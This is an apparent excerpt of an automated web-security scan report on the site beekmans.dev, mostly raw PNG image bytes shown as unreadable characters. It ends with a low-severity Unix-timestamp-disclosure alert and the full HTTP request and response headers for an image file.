          ‰ –<hPʤŒ)â8ÕmZ”ˆ±x‰€Þ«þZþšaÊ;í=\X‰O†¨;¼
          æ	q¶]»6+I§·OÞDÆAÆ'ï—ÑÁq˜CpÓå»q컾2Ïâûq‘—êaÁ|O=ƒ¹ÉD“ÖLڜȰqòbƒ3k}®áœaù£î»ÆÉõ‚½á·JW@>§á6ñ‚
          ÆÝQf?´éû¡çѹÜ\·3ÊzušÎñ(Hé]r:þ†ÁøSÔaêzS>C0CÚÍÈ3
          ÂxÇôF­w—|‘ƒsœŒ:¼c<õ
          êõ4Êã¶b0^à\:èxގ6Eáé³¹ù9Ú½A!@ @ ÿpp³_†%<ý°3R:âԑaAA]ވMŒIïá+óc÷—ú¡6ÖóPÆ»¾Ö§2õ߉™ª”jãûþ¾Îh¬ôä¨>ê¼\Oæ…D†ÙÈh½>·¦÷3½4\úÎø­î‹¯úK|?­¡ñ’ù¢Ç‡úq©8öuãy»ÇÉU<Œ‘Ö`ƒ1ãCÓxŒŸÓzç%i0¦£ò€s½‰sNÂõ¼„ÿ;wìXР4%܌T©;Q‡/x¯e®½°ŒiºVøMƁ@ @ Áò‚–¥-Wç*³Àӌ=%P.æé•~±Ÿ©3š+Ôh¸5‘‘ð´@éþ§fù¢Ô/ø¡ÎîÑÚmÙ ó+Cêˆòz |Æàâkíb'+¥6gÝ{7Î^Œ­¤‚±èQ7zù@9ßás(7àd،8kÆ¨óC8Dސ^¶Ñf§{‡a17Ôtá%rÑ®¨]K]¬7`98†Ëþ'án’·?½–ãlA„Q5nƒ1½ÆS©L1=Âq>nÊ2ßtíæåñ&vUÀçmËÐ#û¡ÌÇQßïqÂO¥ÖSΛµ©)2%b0@ @ –Cèb½ã×4îE!ûžw•ñ¼ý(Zëc}¥ï4J¿ïsS6­'J}DÃ¥¯½«Ï»Û÷ÔPg<t†Tïf_©Î™TªøïÆNåm87d»e¾…òÇàü£§_Åo7 ^Ç$õ[ æÔïä}uÏñøÿƒPéHۏah$OAì*~Ê_RÈk¨ó·F©q8Nj&­.D™û³\_ùiOŸ(ó(Û2Ú׿Iqí[îZíiPEzÞ;HÉöiÈf¸(oïÀ3#Pïy¨ÃÜc$×ë™Æc¿ØïŒôgQ‡¹†é–kT&p¾r\K”7!Ðú+܏»ütz“8¹Fù»÷‘á5øò Íg@߂k8:i_·i¶R·ž„4Ù?ÃqÏ@ŽÀ}¦‘݁FÿTŠñ‘]¨§¨ãDä=­z=@ @ AãD³V­Úµ¥÷*½gi„
          <…!Ú|jý¾¯Ôë¾Ö=çà hAlá° ü7
          ’Rçã¸ÞøìGƒ3>;54ÌC](--]½eʜ2oó•yõ˜­_"4æ2.±Ò ¾çòüee
          Û4¼~ßÓ…J=Wåú•qm€²_EÜh½W]›„sC\ghö¼«Q‡ÛQÞ	¦¨¨$N®ôŠæõAžÇyΫ¾ÇH!½§½ uäF­½¸‰ñÌîü=ÎâÀÎk8¾åÜG/ä •
          ãäZAÏp¶CÜxúî¸-éy·±þí2×óÊ=yitςTâZÊ9
          Ç?z>³Gõz
          @ @ @ @ @ @ ‚ååå+—TÙØB …¦â"
          `‘AN^‚…FǕ"`!A1wúͳM¨ÔI¾çu´Þ%µ›SÁ?
          åå++¥Ú™”:8TþiàÑÃJŒÙ´½lì"°E‹5´ÖøJd”:Ý×úp“JµÝT êFëÖ­WÍ´Q넞Ùß(s†—òŽÚ—·-ÿ’›D¹@ ¨þª«®í+_njxj>çJ
          •:*w@ Ԋ&™T¦˜¿€CÇdŒoÁ£¿ZßxÞÆq@ 4&eÚûÊÜÝtjFûÖ÷ônþ•ñ<ÉM£\@ ¨ÕVµg^þjcñù
          þ¿&£õòÒM 
          F»V­ÚºŽ=ý¢¯ôPÆçJ¿…ϸ«mœM µ ¼¼|eðe)àÑÏcå|ŽŸV÷s·ø8›@ g0ö¼›À©ß‡ÊÐ`üe Ô%Jµ#çÆÙ@P
          nÅ[Z]F'Ìë-xô+ðçuƤ6mÛ¶-½Œ@ ¨Âp
          _©}|ežÅ`2ß+eÞÀçaÆÙ@PÀ—).›†b>*6WúiÕ#H§×³ Óaà{Þ5ÐM¿sc¥?Ǟ¹nÈê7@ ¨¾ï{àËóÁ›ŸC/ý2.PêrЧ褁@ pƋ5ÂtcƒÚÈó¼.WŒ1ëSJ<o_ës1ð==Ëρ§>
          ”¹ïšä«~<ËdÙA*ñ1:ey @ X¡J¥þ¡&ÀqeÕ9’ðcàåÖ{‚3o‡Npc¥~öÓêyŸñ7káÑJ¡Ç\:.*+,\­«lì$VL4%§Bwlþ+Mø¯:/&|i<³ôÑG}OM
          Æ_ƒWo×îEݍW3EjC?å¯Gƒ‰xÒ	‚şø¾—ñôÝoê¿ðù-¸ó!ꤺXo&ü)ÿp„ZïxÞ$f@~Ä@ñ=dJŽL¦@Ÿ
          ™
          ™*mgèÀ§Ò?SIOòÅÇ$ò=Ò+X¶ŸÖ/3raaájñ©`…”éöÆ3ׂó>I¸/–„¿sâủȵsi,Ž„KՐ
          äÉÇ£”é8fŽÿ Pê² ¨h‹Ò–-WO/+hì`˜	íyg/:îs+Ûòë§äTȼœêôÓ¹î÷´;&âßÇ9~<M½v¸·ôàòøô@°Üâïñ§þ5€.êø3zé6ò#øó|
          
          Á?%¾·½ÑúÉPéñmÆJq)J>‹a‰¯0°p€á@ó~ëÒò3Že¢l(½tZïÅÝXãSÁ
          †“Òêr(æƒóñ`Ž8¾NwN‚|ýÿ§â]-oVÈ¡äh£ô¥Ô­7+--ƒ±@ Xá@ƒ9Õ׺;ôÍ×È}äÀ|ܘ9Ôq©§¾yu~¯S?uezúÓÐÓ7Ó/>½@ ,·ø;üI©ÁŸ.¦±ð§@ üãQîûkj­KM*ՁF¾%Ì'Üw¥¶Rjo?¥ö	TЩ4ío‚ß7Î͛+c: ìM¹”º,•jSÊ2j@°BËñ\8ðù¹’,
          ô=o+_©ÎAZï	þݙÿ“'‘‡\ZƒO™FÁ9Ö‚ Mcq×®]…KÁŠˆ¦äÔV­Zµ
          =¯,á¿ê¼q|É
          Cñ¹¥I›À©{á˜ÝK|krmF©
          sòWÇt¯Ä3âÌ V,ò;¸rsã™9¿'bð§@ @ @ @ @ @ @ @ @ @ ,4e̶0Ïےñß3©T1gb*•já§üõ\ÌwJ:X×÷ý5™&Ë”RÍÉcŒ±žÛ˜ñÓ¹¡Rœ¼ÄQVVö/ðæÚäOcӘöžç­'´+*jé§ýMtJoË<Ü'£cǎ+ÅÉK
          iŸ0ÿi·GˆRp
          ›.ívK1yä.îYQ¢‚½3ÊßǤÍ6ÔÁ
          k0ÜÙÜÐ!NŇ;~c¬àÚøÍmn.!÷¸}1|=rRœÜhQo&¼Ï<¼vpüÖ¥ÖYÚü.K
          $7aSdJ‚¢¢-B­wÙƒÇ¾Æóö«.Ö{ÑÀ@rL¥Ê¸Iœ3@ÁŠ(Ž«„ÅÅ)n®ÁÉ´¯ü.øÜ»:/†žÙ/æÌÝ HnmR©öZkUXX¶Z\ÔRڔSxõM¾§¦žîîÆëa:êÚ¿½™1¾¥O¿F^w‚$b`lLPÅj;pÜKÆSÓÁiC|­Ï6EE%qò7mB{è+ý¼ÛÁ_é¾4¬ÄÉ:Þõ®ýi½übՙúvœ¼ÄѐöÑmÚ(?¥/B§•`,@ž¯1\Ðn)¶£@ðO
          °Ü䍺ô±]ŒçæÚûT×'¡^IAþ]ÁÍÒHIÝ..nQà
          L:½S tÏÐSß°ÿ‡Æ“Ñf4¸ê •ÚÅó¼-ÁgW£Ž3JüÐâ÷ï0.t‹Ë(@wCÝ†ÕÆo~qqÆ(u&Žÿ(æ Þ¸ŽNqr£E}¼iÖ6­qí‡i5 Tšíòtè´٣¨¨¨eœM VÜUJí¤½‡@z3Bm,ïðýÕ¥GC&@>öÓæ¾ ­ A%.N V@i¡Ÿxzf¨õO6_ÔäF=
          æ§È7Ê)ÐJ
          †bý
          ~»„ý¡èg–æ.͜Tx^X†ó_.ÿu*u"w¦fzäñ¡/‚’û
          JüA:½®;X ü#±¬
          °zÂùžz2	õ}r9;N^âo¶1žÙú$xösH/Œãd÷b¿½úÍÀgÏ0­wÎõ@^ÒhHû„mÚÒ8…´‘ïuÜóø¾o»V­ÚÆYÁb@à[¢o=}ñWÌ¡ÿ'|ÝlTU]2G”qBN֞>ˤL‡ÒÒÒÕãâþ6‡è²×¢üI¨ÏXðÖ¹à&ŸFí²²¥ÿU\\œ®ø?ßóB}@¯½õï•âø­3~{¯6~ã
          7ðIwäsгZëmãäF‹úxS­©š›tyôÅhŸ‘þïîoy˖-ùþA£É丧G!Ó0p|ê§Ô‘ååå+ÇYªÀ˜µ[g”:ƒÄ[@~Æ 1ß/à@³˜Þ|
          A£
          ½F©ÓÁqý 4_G‘8¹
          º4[
          vhLWä½ò<8’ÞßóX”s!¸sC.ŽYbÈ1_ónEƒñÒ4V‚åËÚ»°PEj#?­'Ç­øZﯺêÚqòGb0¦±ò™¯ÌsÕ
          Æ£=§#ý‰¥m0^Öí#À…/püª'¢/¾
          ð¤ÜKmô:
          õ¸Ü0žóþŒÖ‡ÅI
          Fäa\•ßÀ‰Ù|¥µ>×ڟ>|¼ãäFáM@ ¨†cýH-]ïÇùõijä›4ä{Å?­_†Ò|h*Š‘™ôdf‹€KqÒzOz4P2Êß¿í¢ƘõÿŽ2ãZÓcŽá4XËLÊg
          ßóvà’ò°8La0sK²ë
          .ôœfÌ&r}åï“,bùœ0®—'^{ù„ü(QªŸNoÍ¥ž~*µžï§?´S¾úòwæç›Þ¸@°@ƒ±3š(՟w3¹&N®ä4L
          ®OR)Ÿ	废ŸRûÄüÚ,ÊU‹Ê—µŒKc勞漧=¯œåpÒBn$—¡Lã۞WÆ%×
          1pó¸½SÀ³ÇA®ò.eçµÓ›™K·Éwyøz{ÆÃ+*jÇ¥}M¢£ª"‰G8x\C	ïÆ¡]ô|ñ¼-fɕ‡O.¯o¨±ž±èXãuÅŸ·.ÁŠö'ðÔÓΠA¯°jcöiö#“2í]ÿp”3†#ûÄõåDOÂ÷ÝØׁžT›Bׂ®ÍÂ6!
          Ðà€2öa9,úxI'«3øR®¤mI+æîŠz^DƒÀsŸ¡ï?ŒóŒc»@ßÚ$ŽÃY£Ï“_É1	%ü“9–åSÇ£.F¾B]6e¸Ž\Î]œãÒҖ«Ó#×¶þìÂ:äÖ)n\—¿µãÙbŒ-àn֍ºj¬Û6#76´}ÀÅ4‚4cÈùÔQÉûuÅâÄy’°%;°íòñ7ϟIeŠk–Ïq‡÷˜çåõðZpì¶(gO”›]ªÏï¨×îäc>Ku•+4VÔàW­OeŸ“ëu'ûÞöèߝØWk[¹F°ܙá99×ßqՎ÷ØçÀ[Ç ./€8ïÿõ¹ýî0r7Êߊ<‹bš²¿ó<ä%ö{þaÁ8âóxú9…ú_˜ÒÁS'¡L®^þŒy".Ôã\û0F©Ö¥¬?Ë×nP›>çt`¤Ëƒê×KîBþöԉə¹|ÄïüœLGÙ¥N'Œcó¼@Ø+5d\a>Ëy}e©²8‡èÍèùïRkübžKxS ,·pd›ãa2EÚ½i¬mr܌$yÝéÑp~0ž~Ø÷ü¨„Çyˆ&$vgô@y Ý‘ÿcÈ× ã/q.·äç/ñ2~„w«3Ìb­kr´5H®|óg´~ÐPœã+”õ¥+3»¤G
          ÅçÐx z	r	_˜gӄƒÓqÜPò{ãØQ4ö ÌQ(c—…Ú|‚t†æàÒszÞÀD—“ÛD§ ü§1hzjÊùåg[ ¾ŸóÚñëèêN_áó}”y#òîLå=.N ,E@ùÍg0.“‚&J•µ1iu"ú÷Ç®âx|ð_(|­ã<‹“/k3ÓàÂtpüíPR‡ãó-N\0ø4£^û㷞¸^zÞQšö7q…ÖŽ¦PNwDYÏม~ZÝIEŸÞ%qº3()T‘á9”¾3âN=\:×ßÿiփ^Ùï£îA±?<_Ê뉋r@½:ƒO‡àøù1Ÿ‚óÍ$÷¯éŒ%zÚú”óäCÈ5\ZϒN÷‚×p¯…÷×vŠR…m&ñú+4òŒs
          4C÷;}ã
          Ç+JOÅgä[ôß±øŒB™QORԓ\<\òO_pÕq˜èâß/í©‡e<³›Qæ6ôgê?Ž«pþá&
          öqV½¨çñÅM9xÇoˆßÎp<ªÍçÈScçA*qÎI8÷”ƒþ¯/ÅɶK´œ,ÓðIû‘H'¿Æçg8n„«sŽàØ/‘þ#dÊ!'Má9ÁGYƒ09|
          ÆMØ4"@®Bž7‘w¤++Š}œ['pµfOÆ÷ðýk”O}ñUðùiäoލÓú
          lŸKL*µ)ÛåtFþqž8©ß%WŸ'ã·ڏÆôۘù¾‹ùûÓl£û?ŠŸ8Wä=?S¬7C½èüPeNAŠö¼cqnÖñ”óî3¯ùü?™õLʍ¾ë‰ø>i/ózi|©>.Y~Eß5Z-´ç*û8ôÏnèWƒPu†
          :5™u@hת][腇¢¿ô…Ð <ùΡñ˜}úè…èÿ¯¡ÏMAšù…ý+£ÍÇ¡òÑçô­äYöQðÛî~œàø¦jŒö„ßxðËcLs/ièõԽ췡ñ'‘{ÈAÈ[=íÔÇxOƒ»£ñ“Ç!} ê“_Ÿóôې»¨›–´mۊœE}çßù¡“ãXrCµù¿›[S_Vj$ä]ü?òÊúå?âôÔᛣ¼+פԅäq­3Ûâ†|ûyÆg´î^Û…7ÁŠ
          Ƙ ?²¢BrÁ$[©AæÊ¿#–N©çdßÓƒ0i$ò<0$VÅs×måyG#?7S„BMG¹¯`8ŽŠœÍÁ_Õ_ÛW>c!]Ra=^¥"NrD–ì@ÈóÐC—„
          ’&Ñ~²|DË`0ú8«‰ƒL¦ãN¾CùÃp
          —Q±Ž³¹r3©Tëu877P
          Â1dÒémª¿Õ¤‡0®ÿ$^®mÛ
          ù{„©TÇܼIû"ý.:äß2Æÿÿ¿@£Ñª¸ö8«C~ Ü#CO¿ƒ:ü‚óD;œÂ‰‰¼@°t±Æè¿íQÆ
          à,LÖ!ž¾	ý|£8¹ÀyÂ-:_î‡úÒs¹)½”*i‡òªŒéIÁ2è́sÜÈkÂ9^ÅçiÜ „iêr(Ê
          ‰²»Ñx›sáx³¸˜^—‡?@^ÆsËÆ¸œ÷êvêñ&êÉìgh”¥òÊ<QÖèE 1Þn(ãÔy®íkH/L~¡wLœ­ÀML”~‹öq£&|ÿ‰ÿó:ÐÖ٘«ô¨¦§‹ñôµlO¤ßIo‹8¹8!_»IÚ«7'Y4XÇÉÁ
          úÆèï|Ñ
          éo£ÎBŸ«„.EïÕÔ³âlY”xþVèçw ï8”õ¤'¸‚›¹—/èÇ;€^Ëzýíðdõ3œïLôÝ»QþE菛ãç*ä§ýMPþà–¯¡‹¾…ºä]âÍk0Ê@_S¯£¬ïÈ-8æœc÷˜3«€z낶xõw>òυôÌ忐c³®‰:m“Ò–¥«³-ð;_ g£I=Ž9œ³¹5*%‹&Ƥ6
          ”¹yF²íQ.…žŠÝsïS‚†¶tûݑ'еœÖ=qMôtc	9m0ÛçœÊºâü÷+&玎¿£°îEyŸãš˜ŸÎçàzÚÅÙ˜7H§Cž¡Ð‹ÿÊøÁ,ãòzѐ«ï–POmŠ´›x-(o2žÕûl—ïþ	>øœÂx眷~fbÏUôçZ]œ3„sHê!ñJ§®Ÿ]¾5}
          ú~„yй*6•jþq~û2ýþžèKÔÃ\%bx^ÆG¾KQ—ñèƒ#ÐǏ*¨æDå<Óµ®íQÿÎ’Ây4k}<ê0é_ûZõgn'gŒõÛùô¹júWS։S¤³Ìɸ~èÀê
          nH]}þO´ir®¼Ïƒg¾çõýms·®eÅG}¼i­m¢TfÔ9Ù#d4õëØÀKб®¹ð¦@ Xa@²tÊaZõ™L„2ú3ˆŠ
          õ´P·ƒ>þÿ+ôô·ø¤Gí›à‰vË'oÀ²ˆ
          ´qr¨ô' H?ú€àöª>å'	 ¶8ÿÈ ­0`øÎs"Nnêz¿EÚO0]Ì7qzíèØq%ç…ç™C¡Ô߈ã/JÖ×ÅÝÅ,¢âc”{QCÊmr0"y{¯¢Ì os€E™«!¹	I™Þ×Ð9 |zŽtÇ @µZvØ
          Í@Ôå'û
          ”ƒƒ9PÆÉ`)ýw±Œ¡°r"xüà¦ÏÒ8Ãåp4Ɔ)sÒâàKpE7ÕºµfšŽbÔÑk-¯Á×t„ž¯ ít^+ӈdwk”÷"Êàʌ³KÚVU\	·¼O©;p<”bu»ã­h™³Ý¸æS¡Ðrc”©ŽËÒé=âä:¡uQ)øþjCo¿1œOFšá÷ȵøýðù$^'ÎÝ>:²*0Fýu<mð.ê8’Š5¯•¿ÇYˆ¦e…e«áþ‚ó}‰±ðŒxÕH
          C¹@°"‚œ„g¿Vƒ1¿³?£ßõGž/iH€.¸KyyA^®êXÐq¥Ò"]ê§<0¨³}eørߏ¼êh| ÿà<sÐ7ù"ÿBKéAæ
          ¨\Z\¥¾Õ–x—”¯Þ0ìó<?ÎÁ—û÷`bÝ¡!çßh”yŽŠò§€ÃžaÅÉg0Në'øòŠ.äMZ_+|ÞfÞÉ,/>´vt,X	ç`èêÁôž€ïU^ø%¨¯}DƊõ¤'"½îÀ“®÷D¤½…óŒÏ?[½¬“Ñn«ÐxçãV´4&`q)87»†íà<å¸Y,æG©ßǺs^ >\Ò}ê9×2ÏËõ4žÅÉA£¹
          ýóÌ
          ô‰J<ó“ 5V8$‚9¸[­>ü”[yÖÖ÷PŒó8åjX“RG¡œèã¡ÿ
          @¾¨GâØoЯޡ^Gþcþ\pumlðÌÕO@ÿªbDä<µÁü–gõ?Ú
          ÐW߉9èp\–?Ðp‹28ß­SŸƒ^¼.ʺ\ÄÕ'䕞hÓm¢qµw
          ®u4ÄyD×"¨Þqí—o_ÂmÔ÷‘ÖõÞ+H–4ƒ†ürâJí¢¿¤5$3i÷Ċr­1z’2Hݽ̓ü™ŒrqÞs*ŠM—¼=Íþːq>.¿›‚ÿ÷!YºÝœ1¡@Ú8È74üÒð‘éßD3gÔ !
          þ¿ÐåÆñ4OF]£Hé‚¢`’?É=mtðd:òÎ(¿K|h­(**Úuyĕ©T?Ôçø|¿@ Xr aü³xÆPœ!ôšÏxeŒé@/3†¬Á$}qðåŸäKÔuo¾+*
          Ҙl\2'$
          m]cpwÖ3hJc©öPg.gÄäߏ-+,L”Ò¦ñR³‘F¯i¶Í!Õ9é; Ný!àº&ã\O‚Ç8¾Ôwmûð:ÈŘq‰"—òeÜþí½ökQAŽËåµ´ö*)q1÷òÂÅbvá0Ô(—÷à“Zàéâ<¼•:“²^8—
          Þùwî³@°<£>ƒq¸eÀŽÉè37Ö7ñtˇ=ý?ôU†áú}ú¾LÊt WP_DyìïûÚã궙†¥¹
          ¿èâ×á	•¯¾¹1—éq¦é]æé—œnÆvÆÛ=N®87Ws€«Ìc¨ÿh|>‡ºm'/¤ÁØ<NC¶‡jÛ¶êr	~'_ž¾eeW¼Õ‡þ~¯þv¨¯}€wsÆêqÞEP_.i?â\ä5LJÕÆØÄù_Äñߣ]ÞÁñ'”µmK£—sÔ@ûÂ\v~U‰*iW[¬kBkÍ ¡\Žýr|?ã9âd Q#Ûkñ\]Xp5û(ʼ‡üVêÎÉ+ôôk\Íg«ö½|OÌY³ÞÁÄ¢ŒãŒÝ!Yƒq>oT¸¬}m¶Êy۝O뗜N—ã PpŽ]q:/Ô"È¡>Þ¬Å`|Bœ\ÆS¦±XxS ¬ pc, §hÓ;(¯ ¾£Úãw±*s"H‰ñ’èyð¾I«Ó«/‘ÎIÑ-ÿðÔ3,/Ԇ=1~Ð c¤Õx‹ZE\l&õFFû/ƒ(_A½n)ñ¼\=‹L	ÎʙàHZ™+4¿¶Í9’löM«ÛœÆW.Âl3ÔõS”3e<«íø{uƒ1ÒÞÇ@^¯‡ÊcŒÑ섟g䛂%‡Åe0Æ1iu;&£Pyî|z„©5#ÎÛÍ@9ÿ-6¾ä†ºH—‚Ë®çpÉáHNÂ`ìÀ卨۵¨½WžÂ¹
          C·A•2)s
          þÒÇsâ“ÇsÍìÞ2v»ò¹ÌŽ/À†â·ü׋»öhñ&&	/ã܌ww-'n,ð¼і¬ÓL”ÕçÙ¯>…œŠ6êy0ï#Êý˜^Ý4FрƒcwÇïo✣}Ï»*S¬7 wLJ
          ÿä›(×f0f?j("ogô¹d¢Þ3Hé]Ðï²1rÙ£<êzœÿUä‹:ÌD^rám¨ÃÎmÛ¶­a@¨obÏEøí@”ÜÀ˜„/0øÖrŠRÁÞF™GQ§Q‹j0fu:0¬ÚçúûZŸÍ±&>¬^Äü}=„aÓúÕÊßÓ`ÌMœ¨ǞïB*QÆK8×Þu½˜«]¬7ÃùŸÂñßš!áÔi|yÊ4z¥ç>¸\ú¾  O»ƒó€íí+n:­¹\í­{¡N
          ¾ŸÁ²DþX‹ÇC]l
          §c)Ý2ÜóÊÿ}¹ÊÝ£º8A£5ףϑ§p†ÎaÜüž<_mטÔQß%n0F~ŽwláM@°b †Á˜$2¢RËt¦pò}a0qéo HÞ ¢N ºÇbò’ï'74Fpé	w"åd>þ¹€ÁîQæq¨ÇÇ I~¯Ðx»s)qœ¥Nðš¸k,ã±þPÐùf²	˅òÎø¡ô,›‚AñÙИÝéýY7Lqñú ôq­“P¿q(熳 ÁÙÅ©+ŽÚÒ`ƒ1
          L>7mªÇ #–ƒÁ¸‰ÛÈÎó®EßD«ï¦w+ãÑ–®ypÓÑEç˄·£ÆîEX•	ÁÂŒéQLã)—‘£~ôü{õ;ãøR½z.nq7žÙk,·Ó|Y¦Ô³¨ÇDæ×i}X˺7ËE“Ø3¸Œ/)“k#ðOƒ&Ձzû8öL¸¢æ)pý(÷ÌÀ3·Ê0dÅh-ãìÁ?
          ù&ʋÃ`\Å OÔi$Ž“kœVŠ:œãsc ®NàrNtLvóÉú&öþZþš¨k§„_ñ«ÓºµŒã$ׇ¢vE-Á-‡ ÜÞ8v¬Ó
          s&äœTÒæqÖ×m„Ô¶-1NriŒA¯Í‹ôJ‹«hóQŸÛ!Cqí¯ÕÆßõµO‚*÷'­g¨!z€ã~—ãÿûPGÛiÜ>ŸÎñau‚/ÜPî!(sÚÚåi¶õm¦S·_Xøº†uÇ`¹@CûcДûšñäÍèãQæKàûé]Œ¾<ÊéfJ]]o³ê}jy5SWf8甐c‚ÖçÖåÀV
          Mü”Úõø°¶ú&¨ï>Õa0v:0Wâø‡‘&¼)VÔa0®>p0–ÛÙ jîÜÿȆqÓb,¶8KÈ»JÖ{¢¬¾ ½ÉAAZ]€ß7ÏYҜ³sù3Ò7Â9.E]FOFï8SlÖ/o[îýngT‰„2Üðn:üßݤLûvEíZÆÙª€×ÈØq ֋Q—7ü4c…šûq,7_qÀDă~2~{å2vÐ –KcE¾‰
          •é8>ã¿è{ÞDƒAu¿–ägc[4gûâ¼b0–3äŒ!ƒÀט¢¢:ûaaaÙj.û0;M9·á7»»}9»Ùá&拃/Óæ
          òËC¶&\‘ó58†q]ü‚<å8ÏC¸†ñT8SîÝÊÆ­UFÛàú÷ÄqŒÛ÷>‡eΈëY%þ}´ùÚ(sg(¸×¡Þôa»Ý…ÉÂ&q–؃cá
          Æ@3JC©#p<CZpçÁŒçyÁ–ù&Á?ù&ʋÓ`Œþ<
          º×ãAJíÊ00|ÙŗgäÄdBœ€:¸ãVԇ{CL„\¦Ã wåWX“y0à Up~nêö<¸â[Ôau+†¦¨k98®5Í=/P.
          ž²+q®§è%gYHƒ±~Â/ö¶§AÄùÁº¨7c+DZ“ñùbà™cÈÍùxŸp+ÖUëkPîÇ(w*ÊxÇéªy<j ªj0v+ä:ÑY„çÃõ–ãxÜgn\Èð@êv´ßö¼wñXSaئ0Z’­®ƒNL熺ë‹1n¯\£FØ¢Ån|Çà‚lÄón4æÐxþýU£xî
          EiiéêèÑ—ÑÔôÙЯ$_"¹	9úÎó)Ò+Ö<}h»Ví²{à,¯cþF}yŸÀyÁ™æ^ãþRoŒ³Õç÷(óА/üièãúÅl0>1Y•æB̓§…7ÁŠ.ô‹ýÎ égA¢œ8ƒüt·|$J¢awټqé4óޕ1fG޹ÁIœ•ÒjÈہ“päå&BTøßI]o”:
          
          ê~ìQ ñþ
          ˆì”9Ú׆
          ð¥µMDüµÖZ“KåÜdB©¡ Nî¦?˜Ëq޳¹A\R>Ê8åމ<Cð‰F
          Áz~ß²º!X­¹fs.•D¢M¤Pg–‹¼w㷓0y؟;Ö⼇Ú»ƒÈëqž¯ñýYÈAñ ì6% ؎®}ÓªÚxòÌ(ß8¹V¸Ðóî¹G@âüçôkl:%–Àa%à"nzô.ú!7MêϾ˜ðKu¡"eìðǛèëџñß‡ãØ»Ðw%‡ÆEWÁbâˍãâÜfO©7ºÐÜ™=Mı§%cæ_1Noƒø…Æ]ÆUç1~šqHÕ$†ªhhè\Ûú¾ö.FÛ¼‹:}ãٞ	¯v¯oò7~{×=ßi(ú|}9òVák7ið<zþníï+ÿ@*Åqr½‚TˆsœïÚн(õ^ä8'ÿH¨h5TôÆ^äæ¿çæn¦óṡ罃>É»ºJ‡8¹V ¬½1¹þ:S÷çübÕ%ÚO. ÷.wéåMzÓÉଇ¡16;_Äߝ/æb¾úæ{¡nX%6Ðv‡¼†sN†Œ‡Po;-á×DpÞ³Qޛ87¸ÓãïyàáßPÑÙM›È9àžƒÀ…4*ƒÏW(N&OíÅë¦î‡´2žÙ:wœé‡4–hû…|ù>HÓ£o¡ñ¸J´>ÜDt˜ç‡Úpù9õp:7œ
          ~¬Ò¢¡í“ÜŸ¤ž¸¦.¹õä>¶ø÷
          ÷ƒãŽgÞàX„û–ŸÐF'¡½By£Q7ò÷Ó.ÑZoFCW\œÚ®9êÍ¡¾Bý*xÍt©Ëð…©ÚÞÏÞ,БãÒKèg³ÑG¨C=‰þÒ-·Ÿç
          ¹B§#ô—
          Á=;â˜kqüH×g”zr`u½ù¸—Ð菽‘ï§ÐS߆nsd!qštm†>ÉUUôÃêóþ|ý­N~+®Ê;ÈM¸Öaä Ôµ/α}œœETNÃõ9®ÚC¹§¢Ì¾Ïœ•ÆPèQ}£öc9hƒ3™†:ŒÍhó{‰	¸‘ÿO¨ïܛçÖ7A}¼Iƒq*eÚã|7#O­í'¼)Vpi^ìA@RïÅågÆ3»Öáá€Á¨=à@|TôŸÏP	÷ýõ6Om^c×i¾IóSþzô¸û<caöÂ}$ŠW©ÌGP|S’+7ràX˜M8¨€TùƑF”WQÖ,3[>υëâ¹Q‡Cù6ßÛ½\”¬ÌÁþ?roÚ|èÊueÆØ|å>ŠúvËoFƒJ|xdÛ7­Ïe[Ançr¿8¹VÄíñÈ&/WcàÙçà²o@°”P~qʬR×CÁëžä8f¿Tð‡äpÃ0\¯«ïgÈ)q‘ubqñ¥‹?Iï=eއ=^ 4f®ñ’9z~àØã–_Àý›†à2íyg1FüsƒAŕ|íêÎX¥	¯fÛO½‹v~mwM]|ME:ª»êÍ€ô©®¬×wQû½ŠºÜ‡ÏÿÒã1Nþ‘`ÃäõBpFOè·p2›Ë/™L¦ØMÄÁÔeЇN¨oÅ‘ôWèT/øiÿ\rHje¾·Ҝþ–èXäQLj_…\‹‰n¥Êh<Ȇ¢H¯¾õõcSh€Á9.Âyɯïeù5ËC\έû£ÜY>ò]ŽÏ{ùÇg7§#ç0ì~ç˧qÜÅ%9éÙë†îž9áÐò…ÃH1Žz*Õ|}®ùn´_¾_µN¨N=ÁyGqÚîZW§Zø»¡íÓÐzRÿ§‡aôbSõŽÆ¢ªúvCø›ˆç{pÎÁú¡-†>¯ëÚ;„ƝêíMì8Y hÔ@?+E?<}§/úÞÃ3\û^1‚èíz6úæÝê|‰spö[:ÄÅ×¹
          ç¸ò2õWíé³ÚÅ+ÉÂ6a!¸õHô£¬~X}ޟ¯¿-¿qìÀïûàšiXí‰qã¢\þL”³°ú\ÂG8æ2Û§ÆüŸß©cjýd¨=:~°-z²=MŠ¡È‚ò|<Wo’£Pçúu]váM@  ‘ƒsÆ[æäÂ%›\VHmʹ@ @ @ VL4	•Ú(H«Ë}¥_ö•zÿŸä5|Ӂ@ @ @ ¬ hêyþöÃyú¡@ëÃèmŒß]˜@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ ԅ‚‚ÿô³.ñ6¦IEND®B`‚
          Evidence
          44444444
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        50. GET https://beekmans.dev/img/portfolio/red/Cyber-Kill-Chain.png
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          54444442, which evaluates to: 1971-09-23 04:27:22

          Request
          Request line and header section (291 bytes)
          GET https://beekmans.dev/img/portfolio/red/Cyber-Kill-Chain.png HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
          Accept: image/webp,*/*
          Accept-Language: en-US,en;q=0.5
          Referer: https://beekmans.dev/
          Connection: keep-alive
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1149 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:19 GMT
          Content-Type: image/png
          Content-Length: 418630
          Connection: keep-alive
          last-modified: Tue, 28 Sep 2021 10:12:46 GMT
          etag: "66346-5cd0b748663a0"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: MISS
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
